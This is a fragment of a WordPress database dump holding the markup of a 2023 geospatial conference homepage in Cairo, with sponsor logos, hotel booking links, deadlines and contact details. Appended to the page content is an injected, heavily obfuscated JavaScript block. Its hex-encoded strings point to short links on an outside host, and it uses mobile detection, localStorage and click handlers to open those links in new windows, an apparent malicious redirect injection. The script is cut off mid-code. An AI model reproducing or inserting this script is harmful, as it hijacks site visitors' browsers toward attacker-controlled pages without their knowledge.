11:30:48','',3066,'https://gsw2023.com/?p=4626',0,'revision','',0);
INSERT INTO `dnctiavkr_posts` VALUES
(4627,1,'2023-06-03 11:44:52','2023-06-03 11:44:52','[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609238799{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n<a href=\"https://www.giscon.de/en/\"><img class=\"aligncenter wp-image-4597 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"300\" height=\"222\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\r\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\r\n[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]\r\n<ul>\r\n 	<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\r\n</ul>\r\n[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]\r\n<ul>\r\n 	<li><strong>Full paper Author notification: June 15, 2023</strong></li>\r\n</ul>\r\n[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]\r\n<ul>\r\n 	<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\r\n</ul>\r\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1685735404108{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\r\n<ul>\r\n 	<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\r\n 	<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\r\n 	<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\r\n</ul>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1685153474011{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1685153388835{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"]\r\n\r\n[vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s 